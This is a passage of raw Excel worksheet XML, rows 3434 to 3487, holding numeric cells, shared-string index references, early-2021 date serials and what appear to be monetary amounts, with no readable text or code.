      </c>
      <c r="F3434" t="s">
        <v>12709</v>
      </c>
      <c r="G3434" s="1">
        <v>44207</v>
      </c>
      <c r="H3434">
        <v>275000</v>
      </c>
      <c r="I3434" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3435" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3435">
        <v>23567</v>
      </c>
      <c r="B3435">
        <v>2580</v>
      </c>
      <c r="C3435" t="s">
        <v>6376</v>
      </c>
      <c r="D3435" t="s">
        <v>12708</v>
      </c>
      <c r="E3435">
        <v>5</v>
      </c>
      <c r="F3435" t="s">
        <v>12710</v>
      </c>
      <c r="G3435" s="1">
        <v>44207</v>
      </c>
      <c r="H3435">
        <v>275000</v>
      </c>
      <c r="I3435" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3436" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3436">
        <v>23568</v>
      </c>
      <c r="B3436">
        <v>2580</v>
      </c>
      <c r="C3436" t="s">
        <v>6376</v>
      </c>
      <c r="D3436" t="s">
        <v>12708</v>
      </c>
      <c r="E3436">
        <v>5</v>
      </c>
      <c r="F3436" t="s">
        <v>9437</v>
      </c>
      <c r="G3436" s="1">
        <v>44207</v>
      </c>
      <c r="H3436">
        <v>150000</v>
      </c>
      <c r="I3436" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3437" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3437">
        <v>23572</v>
      </c>
      <c r="B3437">
        <v>5154</v>
      </c>
      <c r="C3437" t="s">
        <v>8242</v>
      </c>
      <c r="D3437" t="s">
        <v>12711</v>
      </c>
      <c r="E3437">
        <v>14</v>
      </c>
      <c r="F3437" t="s">
        <v>12712</v>
      </c>
      <c r="G3437" s="1">
        <v>44267</v>
      </c>
      <c r="H3437">
        <v>300000</v>
      </c>
      <c r="I3437" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="3438" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3438">
        <v>23574</v>
      </c>
      <c r="B3438">
        <v>1999</v>
      </c>
      <c r="C3438" t="s">
        <v>5213</v>
      </c>
      <c r="D3438" t="s">
        <v>12713</v>
      </c>
      <c r="E3438">
        <v>10</v>
      </c>
      <c r="F3438" t="s">
        <v>9925</v>
      </c>
      <c r="G3438" s="1">
        <v>44228</v>
      </c>
      <c r="H3438">
        <v>1008000</v>
      </c>
      <c r="J3438" t="s">
        <v>9905</v>
      </c>
    </row>
    <row r="3439" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3439">
        <v>23575</v>
      </c>
      <c r="B3439">
        <v>1265</v>
      </c>
      <c r="C3439" t="s">
        <v>3607</v>
      </c>
      <c r="D3439" t="s">
        <v>12046</v>
      </c>
      <c r="E3439">
        <v>29</v>
      </c>
      <c r="F3439" t="s">
        <v>12714</v>
      </c>
      <c r="G3439" s="1">
        <v>44347</v>
      </c>
      <c r="H3439">
        <v>50000</v>
      </c>
      <c r="J3439" t="s">
        <v>12715</v>
      </c>
    </row>
    <row r="3440" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3440">
        <v>23576</v>
      </c>
      <c r="B3440">
        <v>5103</v>
      </c>
      <c r="C3440" t="s">
        <v>8092</v>
      </c>
      <c r="D3440" t="s">
        <v>12716</v>
      </c>
      <c r="E3440">
        <v>1</v>
      </c>
      <c r="F3440" t="s">
        <v>12717</v>
      </c>
      <c r="G3440" s="1">
        <v>44193</v>
      </c>
      <c r="H3440">
        <v>120</v>
      </c>
      <c r="I3440" t="s">
        <v>12718</v>
      </c>
      <c r="J3440" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3441" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3441">
        <v>23577</v>
      </c>
      <c r="B3441">
        <v>5189</v>
      </c>
      <c r="C3441" t="s">
        <v>8256</v>
      </c>
      <c r="D3441" t="s">
        <v>12719</v>
      </c>
      <c r="E3441">
        <v>9</v>
      </c>
      <c r="F3441" t="s">
        <v>12720</v>
      </c>
      <c r="G3441" s="1">
        <v>44193</v>
      </c>
      <c r="H3441">
        <v>317391</v>
      </c>
      <c r="I3441" t="s">
        <v>12721</v>
      </c>
    </row>
    <row r="3442" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3442">
        <v>23578</v>
      </c>
      <c r="B3442">
        <v>1035</v>
      </c>
      <c r="C3442" t="s">
        <v>3732</v>
      </c>
      <c r="D3442" t="s">
        <v>12722</v>
      </c>
      <c r="E3442">
        <v>16</v>
      </c>
      <c r="F3442" t="s">
        <v>945</v>
      </c>
      <c r="G3442" s="1">
        <v>44211</v>
      </c>
      <c r="H3442">
        <v>6240000</v>
      </c>
      <c r="J3442" t="s">
        <v>12723</v>
      </c>
    </row>
    <row r="3443" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3443">
        <v>23579</v>
      </c>
      <c r="B3443">
        <v>1035</v>
      </c>
      <c r="C3443" t="s">
        <v>3732</v>
      </c>
      <c r="D3443" t="s">
        <v>12722</v>
      </c>
      <c r="E3443">
        <v>16</v>
      </c>
      <c r="F3443" t="s">
        <v>4062</v>
      </c>
      <c r="G3443" s="1">
        <v>44211</v>
      </c>
      <c r="H3443">
        <v>6240000</v>
      </c>
      <c r="J3443" t="s">
        <v>10437</v>
      </c>
    </row>
    <row r="3444" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3444">
        <v>23580</v>
      </c>
      <c r="B3444">
        <v>1035</v>
      </c>
      <c r="C3444" t="s">
        <v>3732</v>
      </c>
      <c r="D3444" t="s">
        <v>12722</v>
      </c>
      <c r="E3444">
        <v>16</v>
      </c>
      <c r="F3444" t="s">
        <v>6504</v>
      </c>
      <c r="G3444" s="1">
        <v>44211</v>
      </c>
      <c r="H3444">
        <v>6240000</v>
      </c>
      <c r="J3444" t="s">
        <v>12723</v>
      </c>
    </row>
    <row r="3445" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3445">
        <v>23582</v>
      </c>
      <c r="B3445">
        <v>736</v>
      </c>
      <c r="C3445" t="s">
        <v>2082</v>
      </c>
      <c r="D3445" t="s">
        <v>12724</v>
      </c>
      <c r="E3445">
        <v>17</v>
      </c>
      <c r="F3445" t="s">
        <v>4686</v>
      </c>
      <c r="G3445" s="1">
        <v>44221</v>
      </c>
      <c r="H3445">
        <v>70000</v>
      </c>
      <c r="J3445" t="s">
        <v>12725</v>
      </c>
    </row>
    <row r="3446" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3446">
        <v>23583</v>
      </c>
      <c r="B3446">
        <v>927</v>
      </c>
      <c r="C3446" t="s">
        <v>2649</v>
      </c>
      <c r="D3446" t="s">
        <v>12726</v>
      </c>
      <c r="E3446">
        <v>14</v>
      </c>
      <c r="F3446" t="s">
        <v>9523</v>
      </c>
      <c r="G3446" s="1">
        <v>44286</v>
      </c>
      <c r="H3446">
        <v>600000</v>
      </c>
      <c r="I3446" t="s">
        <v>12727</v>
      </c>
      <c r="J3446" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="3447" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3447">
        <v>23584</v>
      </c>
      <c r="B3447">
        <v>736</v>
      </c>
      <c r="C3447" t="s">
        <v>2082</v>
      </c>
      <c r="D3447" t="s">
        <v>12724</v>
      </c>
      <c r="E3447">
        <v>17</v>
      </c>
      <c r="F3447" t="s">
        <v>10157</v>
      </c>
      <c r="G3447" s="1">
        <v>44221</v>
      </c>
      <c r="H3447">
        <v>45000</v>
      </c>
      <c r="J3447" t="s">
        <v>10585</v>
      </c>
    </row>
    <row r="3448" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3448">
        <v>23585</v>
      </c>
      <c r="B3448">
        <v>736</v>
      </c>
      <c r="C3448" t="s">
        <v>2082</v>
      </c>
      <c r="D3448" t="s">
        <v>12724</v>
      </c>
      <c r="E3448">
        <v>17</v>
      </c>
      <c r="F3448" t="s">
        <v>12728</v>
      </c>
      <c r="G3448" s="1">
        <v>44221</v>
      </c>
      <c r="H3448">
        <v>120000</v>
      </c>
      <c r="J3448" t="s">
        <v>12729</v>
      </c>
    </row>
    <row r="3449" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3449">
        <v>23586</v>
      </c>
      <c r="B3449">
        <v>2821</v>
      </c>
      <c r="C3449" t="s">
        <v>6047</v>
      </c>
      <c r="D3449" t="s">
        <v>12730</v>
      </c>
      <c r="E3449">
        <v>12</v>
      </c>
      <c r="F3449" t="s">
        <v>9925</v>
      </c>
      <c r="G3449" s="1">
        <v>44207</v>
      </c>
      <c r="H3449">
        <v>25000</v>
      </c>
      <c r="I3449" t="s">
        <v>12731</v>
      </c>
    </row>
    <row r="3450" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3450">
        <v>23587</v>
      </c>
      <c r="B3450">
        <v>2821</v>
      </c>
      <c r="C3450" t="s">
        <v>6047</v>
      </c>
      <c r="D3450" t="s">
        <v>12730</v>
      </c>
      <c r="E3450">
        <v>12</v>
      </c>
      <c r="F3450" t="s">
        <v>7296</v>
      </c>
      <c r="G3450" s="1">
        <v>44207</v>
      </c>
      <c r="H3450">
        <v>25000</v>
      </c>
      <c r="I3450" t="s">
        <v>12732</v>
      </c>
    </row>
    <row r="3451" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3451">
        <v>23588</v>
      </c>
      <c r="B3451">
        <v>2821</v>
      </c>
      <c r="C3451" t="s">
        <v>6047</v>
      </c>
      <c r="D3451" t="s">
        <v>12730</v>
      </c>
      <c r="E3451">
        <v>12</v>
      </c>
      <c r="F3451" t="s">
        <v>9561</v>
      </c>
      <c r="G3451" s="1">
        <v>44207</v>
      </c>
      <c r="H3451">
        <v>6000</v>
      </c>
      <c r="I3451" t="s">
        <v>12733</v>
      </c>
    </row>
    <row r="3452" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3452">
        <v>23589</v>
      </c>
      <c r="B3452">
        <v>2821</v>
      </c>
      <c r="C3452" t="s">
        <v>6047</v>
      </c>
      <c r="D3452" t="s">
        <v>12730</v>
      </c>
      <c r="E3452">
        <v>12</v>
      </c>
      <c r="F3452" t="s">
        <v>9523</v>
      </c>
      <c r="G3452" s="1">
        <v>44207</v>
      </c>
      <c r="H3452">
        <v>6000</v>
      </c>
      <c r="I3452" t="s">
        <v>12732</v>
      </c>
    </row>
    <row r="3453" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3453">
        <v>23601</v>
      </c>
      <c r="B3453">
        <v>1805</v>
      </c>
      <c r="C3453" t="s">
        <v>6382</v>
      </c>
      <c r="D3453" t="s">
        <v>12734</v>
      </c>
      <c r="E3453">
        <v>26</v>
      </c>
      <c r="F3453" t="s">
        <v>364</v>
      </c>
      <c r="G3453" s="1">
        <v>44229</v>
      </c>
      <c r="H3453">
        <v>50000</v>
      </c>
      <c r="J3453" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3454" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3454">
        <v>23602</v>
      </c>
      <c r="B3454">
        <v>5113</v>
      </c>
      <c r="C3454" t="s">
        <v>8078</v>
      </c>
      <c r="D3454" t="s">
        <v>12524</v>
      </c>
      <c r="E3454">
        <v>16</v>
      </c>
      <c r="F3454" t="s">
        <v>6635</v>
      </c>
      <c r="G3454" s="1">
        <v>44194</v>
      </c>
      <c r="H3454">
        <v>1200</v>
      </c>
      <c r="I3454" t="s">
        <v>12735</v>
      </c>
    </row>
    <row r="3455" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3455">
        <v>23603</v>
      </c>
      <c r="B3455">
        <v>1311</v>
      </c>
      <c r="C3455" t="s">
        <v>4006</v>
      </c>
      <c r="D3455" t="s">
        <v>16497</v>
      </c>
      <c r="E3455">
        <v>26</v>
      </c>
      <c r="F3455" t="s">
        <v>364</v>
      </c>
      <c r="G3455" s="1">
        <v>44250</v>
      </c>
      <c r="H3455" s="4">
        <v>550000</v>
      </c>
      <c r="I3455" t="s">
        <v>9952</v>
      </c>
      <c r="J3455" t="s">
        <v>11181</v>
      </c>
    </row>
    <row r="3456" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3456">
        <v>23604</v>
      </c>
      <c r="B3456">
        <v>1969</v>
      </c>
      <c r="C3456" t="s">
        <v>6390</v>
      </c>
      <c r="D3456" t="s">
        <v>12736</v>
      </c>
      <c r="E3456">
        <v>26</v>
      </c>
      <c r="F3456" t="s">
        <v>12737</v>
      </c>
      <c r="G3456" s="1">
        <v>44225</v>
      </c>
      <c r="H3456">
        <v>8000</v>
      </c>
      <c r="J3456" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="3457" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3457">
        <v>23605</v>
      </c>
      <c r="B3457">
        <v>1969</v>
      </c>
      <c r="C3457" t="s">
        <v>16498</v>
      </c>
      <c r="D3457" t="s">
        <v>16499</v>
      </c>
      <c r="E3457">
        <v>26</v>
      </c>
      <c r="F3457" t="s">
        <v>12738</v>
      </c>
      <c r="G3457" s="1">
        <v>44225</v>
      </c>
      <c r="H3457">
        <v>152101.68</v>
      </c>
      <c r="J3457" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="3458" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3458">
        <v>23606</v>
      </c>
      <c r="B3458">
        <v>1969</v>
      </c>
      <c r="C3458" t="s">
        <v>6390</v>
      </c>
      <c r="D3458" t="s">
        <v>12736</v>
      </c>
      <c r="E3458">
        <v>26</v>
      </c>
      <c r="F3458" t="s">
        <v>12739</v>
      </c>
      <c r="G3458" s="1">
        <v>44225</v>
      </c>
      <c r="H3458">
        <v>10000</v>
      </c>
      <c r="J3458" t="s">
        <v>12740</v>
      </c>
    </row>
    <row r="3459" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3459">
        <v>23607</v>
      </c>
      <c r="B3459">
        <v>1969</v>
      </c>
      <c r="C3459" t="s">
        <v>16498</v>
      </c>
      <c r="D3459" t="s">
        <v>16499</v>
      </c>
      <c r="E3459">
        <v>26</v>
      </c>
      <c r="F3459" t="s">
        <v>9900</v>
      </c>
      <c r="G3459" s="1">
        <v>44225</v>
      </c>
      <c r="H3459">
        <v>83333.33</v>
      </c>
      <c r="J3459" t="s">
        <v>12740</v>
      </c>
    </row>
    <row r="3460" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3460">
        <v>23608</v>
      </c>
      <c r="B3460">
        <v>1969</v>
      </c>
      <c r="C3460" t="s">
        <v>6390</v>
      </c>
      <c r="D3460" t="s">
        <v>12736</v>
      </c>
      <c r="E3460">
        <v>26</v>
      </c>
      <c r="F3460" t="s">
        <v>4686</v>
      </c>
      <c r="G3460" s="1">
        <v>44225</v>
      </c>
      <c r="H3460">
        <v>1000</v>
      </c>
      <c r="I3460" t="s">
        <v>12411</v>
      </c>
    </row>
    <row r="3461" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3461">
        <v>23609</v>
      </c>
      <c r="B3461">
        <v>1969</v>
      </c>
      <c r="C3461" t="s">
        <v>6390</v>
      </c>
      <c r="D3461" t="s">
        <v>12736</v>
      </c>
      <c r="E3461">
        <v>26</v>
      </c>
      <c r="F3461" t="s">
        <v>2236</v>
      </c>
      <c r="G3461" s="1">
        <v>44225</v>
      </c>
      <c r="H3461">
        <v>9000</v>
      </c>
      <c r="I3461" t="s">
        <v>12411</v>
      </c>
    </row>
    <row r="3462" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3462">
        <v>23610</v>
      </c>
      <c r="B3462">
        <v>1969</v>
      </c>
      <c r="C3462" t="s">
        <v>6390</v>
      </c>
      <c r="D3462" t="s">
        <v>12736</v>
      </c>
      <c r="E3462">
        <v>26</v>
      </c>
      <c r="F3462" t="s">
        <v>12741</v>
      </c>
      <c r="G3462" s="1">
        <v>44225</v>
      </c>
      <c r="H3462">
        <v>1000</v>
      </c>
      <c r="I3462" t="s">
        <v>12411</v>
      </c>
    </row>
    <row r="3463" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3463">
        <v>23611</v>
      </c>
      <c r="B3463">
        <v>1969</v>
      </c>
      <c r="C3463" t="s">
        <v>6390</v>
      </c>
      <c r="D3463" t="s">
        <v>12736</v>
      </c>
      <c r="E3463">
        <v>26</v>
      </c>
      <c r="F3463" t="s">
        <v>12742</v>
      </c>
      <c r="G3463" s="1">
        <v>44225</v>
      </c>
      <c r="H3463">
        <v>9000</v>
      </c>
      <c r="I3463" t="s">
        <v>12411</v>
      </c>
    </row>
    <row r="3464" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3464">
        <v>23612</v>
      </c>
      <c r="B3464">
        <v>1969</v>
      </c>
      <c r="C3464" t="s">
        <v>6390</v>
      </c>
      <c r="D3464" t="s">
        <v>12736</v>
      </c>
      <c r="E3464">
        <v>26</v>
      </c>
      <c r="F3464" t="s">
        <v>3814</v>
      </c>
      <c r="G3464" s="1">
        <v>44225</v>
      </c>
      <c r="H3464">
        <v>1000</v>
      </c>
      <c r="I3464" t="s">
        <v>12411</v>
      </c>
    </row>
    <row r="3465" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3465">
        <v>23613</v>
      </c>
      <c r="B3465">
        <v>1969</v>
      </c>
      <c r="C3465" t="s">
        <v>6390</v>
      </c>
      <c r="D3465" t="s">
        <v>12736</v>
      </c>
      <c r="E3465">
        <v>26</v>
      </c>
      <c r="F3465" t="s">
        <v>1746</v>
      </c>
      <c r="G3465" s="1">
        <v>44225</v>
      </c>
      <c r="H3465">
        <v>8000</v>
      </c>
      <c r="I3465" t="s">
        <v>12411</v>
      </c>
    </row>
    <row r="3466" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3466">
        <v>23614</v>
      </c>
      <c r="B3466">
        <v>1969</v>
      </c>
      <c r="C3466" t="s">
        <v>6390</v>
      </c>
      <c r="D3466" t="s">
        <v>12736</v>
      </c>
      <c r="E3466">
        <v>26</v>
      </c>
      <c r="F3466" t="s">
        <v>9673</v>
      </c>
      <c r="G3466" s="1">
        <v>44225</v>
      </c>
      <c r="H3466">
        <v>1000</v>
      </c>
      <c r="I3466" t="s">
        <v>12411</v>
      </c>
    </row>
    <row r="3467" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3467">
        <v>23615</v>
      </c>
      <c r="B3467">
        <v>1969</v>
      </c>
      <c r="C3467" t="s">
        <v>6390</v>
      </c>
      <c r="D3467" t="s">
        <v>12736</v>
      </c>
      <c r="E3467">
        <v>26</v>
      </c>
      <c r="F3467" t="s">
        <v>609</v>
      </c>
      <c r="G3467" s="1">
        <v>44225</v>
      </c>
      <c r="H3467">
        <v>18000</v>
      </c>
      <c r="I3467" t="s">
        <v>12411</v>
      </c>
    </row>
    <row r="3468" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3468">
        <v>23617</v>
      </c>
      <c r="B3468">
        <v>2719</v>
      </c>
      <c r="C3468" t="s">
        <v>6860</v>
      </c>
      <c r="D3468" t="s">
        <v>10823</v>
      </c>
      <c r="E3468">
        <v>13</v>
      </c>
      <c r="F3468" t="s">
        <v>12743</v>
      </c>
      <c r="G3468" s="1">
        <v>44221</v>
      </c>
      <c r="H3468">
        <v>103107</v>
      </c>
      <c r="J3468" t="s">
        <v>12744</v>
      </c>
    </row>
    <row r="3469" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3469">
        <v>23618</v>
      </c>
      <c r="B3469">
        <v>2719</v>
      </c>
      <c r="C3469" t="s">
        <v>6860</v>
      </c>
      <c r="D3469" t="s">
        <v>10823</v>
      </c>
      <c r="E3469">
        <v>13</v>
      </c>
      <c r="F3469" t="s">
        <v>4686</v>
      </c>
      <c r="G3469" s="1">
        <v>44221</v>
      </c>
      <c r="H3469">
        <v>0</v>
      </c>
    </row>
    <row r="3470" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3470">
        <v>23619</v>
      </c>
      <c r="B3470">
        <v>2719</v>
      </c>
      <c r="C3470" t="s">
        <v>6860</v>
      </c>
      <c r="D3470" t="s">
        <v>10823</v>
      </c>
      <c r="E3470">
        <v>13</v>
      </c>
      <c r="F3470" t="s">
        <v>1746</v>
      </c>
      <c r="G3470" s="1">
        <v>44221</v>
      </c>
      <c r="H3470">
        <v>85009</v>
      </c>
      <c r="J3470" t="s">
        <v>12745</v>
      </c>
    </row>
    <row r="3471" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3471">
        <v>23620</v>
      </c>
      <c r="B3471">
        <v>2719</v>
      </c>
      <c r="C3471" t="s">
        <v>6860</v>
      </c>
      <c r="D3471" t="s">
        <v>10823</v>
      </c>
      <c r="E3471">
        <v>13</v>
      </c>
      <c r="F3471" t="s">
        <v>12746</v>
      </c>
      <c r="G3471" s="1">
        <v>44221</v>
      </c>
      <c r="H3471">
        <v>450</v>
      </c>
      <c r="J3471" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3472" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3472">
        <v>23622</v>
      </c>
      <c r="B3472">
        <v>5171</v>
      </c>
      <c r="C3472" t="s">
        <v>8280</v>
      </c>
      <c r="D3472" t="s">
        <v>12747</v>
      </c>
      <c r="E3472">
        <v>13</v>
      </c>
      <c r="F3472" t="s">
        <v>8282</v>
      </c>
      <c r="G3472" s="1">
        <v>44294</v>
      </c>
      <c r="H3472">
        <v>1200</v>
      </c>
    </row>
    <row r="3473" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3473">
        <v>23623</v>
      </c>
      <c r="B3473">
        <v>1318</v>
      </c>
      <c r="C3473" t="s">
        <v>3118</v>
      </c>
      <c r="D3473" t="s">
        <v>12748</v>
      </c>
      <c r="E3473">
        <v>12</v>
      </c>
      <c r="F3473" t="s">
        <v>8913</v>
      </c>
      <c r="G3473" s="1">
        <v>44214</v>
      </c>
      <c r="H3473">
        <v>100000</v>
      </c>
      <c r="I3473" t="s">
        <v>12749</v>
      </c>
    </row>
    <row r="3474" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3474">
        <v>23624</v>
      </c>
      <c r="B3474">
        <v>1318</v>
      </c>
      <c r="C3474" t="s">
        <v>3118</v>
      </c>
      <c r="D3474" t="s">
        <v>12748</v>
      </c>
      <c r="E3474">
        <v>12</v>
      </c>
      <c r="F3474" t="s">
        <v>12720</v>
      </c>
      <c r="G3474" s="1">
        <v>44214</v>
      </c>
      <c r="H3474">
        <v>150000</v>
      </c>
      <c r="I3474" t="s">
        <v>12750</v>
      </c>
    </row>
    <row r="3475" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3475">
        <v>23628</v>
      </c>
      <c r="B3475">
        <v>5113</v>
      </c>
      <c r="C3475" t="s">
        <v>8078</v>
      </c>
      <c r="D3475" t="s">
        <v>12524</v>
      </c>
      <c r="E3475">
        <v>16</v>
      </c>
      <c r="F3475" t="s">
        <v>12751</v>
      </c>
      <c r="G3475" s="1">
        <v>44194</v>
      </c>
      <c r="H3475">
        <v>550</v>
      </c>
      <c r="I3475" t="s">
        <v>12752</v>
      </c>
    </row>
    <row r="3476" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3476">
        <v>23630</v>
      </c>
      <c r="B3476">
        <v>5113</v>
      </c>
      <c r="C3476" t="s">
        <v>8078</v>
      </c>
      <c r="D3476" t="s">
        <v>12524</v>
      </c>
      <c r="E3476">
        <v>16</v>
      </c>
      <c r="F3476" t="s">
        <v>9929</v>
      </c>
      <c r="G3476" s="1">
        <v>44194</v>
      </c>
      <c r="H3476">
        <v>800</v>
      </c>
      <c r="I3476" t="s">
        <v>12753</v>
      </c>
    </row>
    <row r="3477" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3477">
        <v>23631</v>
      </c>
      <c r="B3477">
        <v>1518</v>
      </c>
      <c r="C3477" t="s">
        <v>4024</v>
      </c>
      <c r="D3477" t="s">
        <v>12754</v>
      </c>
      <c r="E3477">
        <v>26</v>
      </c>
      <c r="F3477" t="s">
        <v>364</v>
      </c>
      <c r="G3477" s="1">
        <v>44271</v>
      </c>
      <c r="H3477">
        <v>100000</v>
      </c>
      <c r="J3477" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="3478" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3478">
        <v>23632</v>
      </c>
      <c r="B3478">
        <v>1518</v>
      </c>
      <c r="C3478" t="s">
        <v>4024</v>
      </c>
      <c r="D3478" t="s">
        <v>12754</v>
      </c>
      <c r="E3478">
        <v>26</v>
      </c>
      <c r="F3478" t="s">
        <v>11081</v>
      </c>
      <c r="G3478" s="1">
        <v>44271</v>
      </c>
      <c r="H3478">
        <v>100000</v>
      </c>
      <c r="J3478" t="s">
        <v>12755</v>
      </c>
    </row>
    <row r="3479" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3479">
        <v>23633</v>
      </c>
      <c r="B3479">
        <v>1518</v>
      </c>
      <c r="C3479" t="s">
        <v>4024</v>
      </c>
      <c r="D3479" t="s">
        <v>12754</v>
      </c>
      <c r="E3479">
        <v>26</v>
      </c>
      <c r="F3479" t="s">
        <v>3462</v>
      </c>
      <c r="G3479" s="1">
        <v>44271</v>
      </c>
      <c r="H3479">
        <v>300000</v>
      </c>
      <c r="J3479" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="3480" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3480">
        <v>23634</v>
      </c>
      <c r="B3480">
        <v>2719</v>
      </c>
      <c r="C3480" t="s">
        <v>6860</v>
      </c>
      <c r="D3480" t="s">
        <v>10823</v>
      </c>
      <c r="E3480">
        <v>13</v>
      </c>
      <c r="F3480" t="s">
        <v>12756</v>
      </c>
      <c r="G3480" s="1">
        <v>44221</v>
      </c>
      <c r="H3480">
        <v>15360</v>
      </c>
      <c r="J3480" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3481" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3481">
        <v>23635</v>
      </c>
      <c r="B3481">
        <v>1161</v>
      </c>
      <c r="C3481" t="s">
        <v>3769</v>
      </c>
      <c r="D3481" t="s">
        <v>12300</v>
      </c>
      <c r="E3481">
        <v>12</v>
      </c>
      <c r="F3481" t="s">
        <v>12757</v>
      </c>
      <c r="G3481" s="1">
        <v>44214</v>
      </c>
      <c r="H3481">
        <v>500000</v>
      </c>
      <c r="I3481" t="s">
        <v>12758</v>
      </c>
      <c r="J3481" t="s">
        <v>12301</v>
      </c>
    </row>
    <row r="3482" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3482">
        <v>23636</v>
      </c>
      <c r="B3482">
        <v>1296</v>
      </c>
      <c r="C3482" t="s">
        <v>3410</v>
      </c>
      <c r="D3482" t="s">
        <v>12759</v>
      </c>
      <c r="E3482">
        <v>16</v>
      </c>
      <c r="F3482" t="s">
        <v>945</v>
      </c>
      <c r="G3482" s="1">
        <v>44204</v>
      </c>
      <c r="H3482">
        <v>4320</v>
      </c>
      <c r="I3482" t="s">
        <v>12760</v>
      </c>
    </row>
    <row r="3483" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3483">
        <v>23637</v>
      </c>
      <c r="B3483">
        <v>237</v>
      </c>
      <c r="C3483" t="s">
        <v>798</v>
      </c>
      <c r="D3483" t="s">
        <v>12761</v>
      </c>
      <c r="E3483">
        <v>16</v>
      </c>
      <c r="F3483" t="s">
        <v>9435</v>
      </c>
      <c r="G3483" s="1">
        <v>44238</v>
      </c>
      <c r="H3483">
        <v>50</v>
      </c>
      <c r="J3483" t="s">
        <v>12762</v>
      </c>
    </row>
    <row r="3484" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3484">
        <v>23638</v>
      </c>
      <c r="B3484">
        <v>642</v>
      </c>
      <c r="C3484" t="s">
        <v>59</v>
      </c>
      <c r="D3484" t="s">
        <v>9510</v>
      </c>
      <c r="E3484">
        <v>10</v>
      </c>
      <c r="F3484" t="s">
        <v>12763</v>
      </c>
      <c r="G3484" s="1">
        <v>44245</v>
      </c>
      <c r="H3484">
        <v>360</v>
      </c>
      <c r="J3484" t="s">
        <v>11455</v>
      </c>
    </row>
    <row r="3485" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3485">
        <v>23639</v>
      </c>
      <c r="B3485">
        <v>5137</v>
      </c>
      <c r="C3485" t="s">
        <v>8293</v>
      </c>
      <c r="D3485" t="s">
        <v>12764</v>
      </c>
      <c r="E3485">
        <v>16</v>
      </c>
      <c r="F3485" t="s">
        <v>8295</v>
      </c>
      <c r="G3485" s="1">
        <v>44243</v>
      </c>
      <c r="H3485">
        <v>390000</v>
      </c>
      <c r="I3485" t="s">
        <v>12765</v>
      </c>
    </row>
    <row r="3486" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3486">
        <v>23640</v>
      </c>
      <c r="B3486">
        <v>1195</v>
      </c>
      <c r="C3486" t="s">
        <v>4015</v>
      </c>
      <c r="D3486" t="s">
        <v>12766</v>
      </c>
      <c r="E3486">
        <v>16</v>
      </c>
      <c r="F3486" t="s">
        <v>9437</v>
      </c>
      <c r="G3486" s="1">
        <v>44223</v>
      </c>
      <c r="H3486">
        <v>120000</v>
      </c>
      <c r="J3486" t="s">
        <v>12767</v>
      </c>
    </row>
    <row r="3487" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3487">
        <v>23641</v>
      </c>
      <c r="B3487">
        <v>1195</v>
      </c>
      <c r="C3487" t="s">
        <v>4015</v>
      </c>
      <c r="D3487" t="s">
        <v>12766</v>
      </c>
      <c r="E3487">
        <v>16</v>
      </c>
      <c r="F3487" t="s">
        <v>12768</v>
      </c>
      <c r="G3487" s="1">
        <v>44223</v>
      </c>
      <c r="H3487">
        <v>50000</v>
      </c>
      <c r="J3487" t="s">
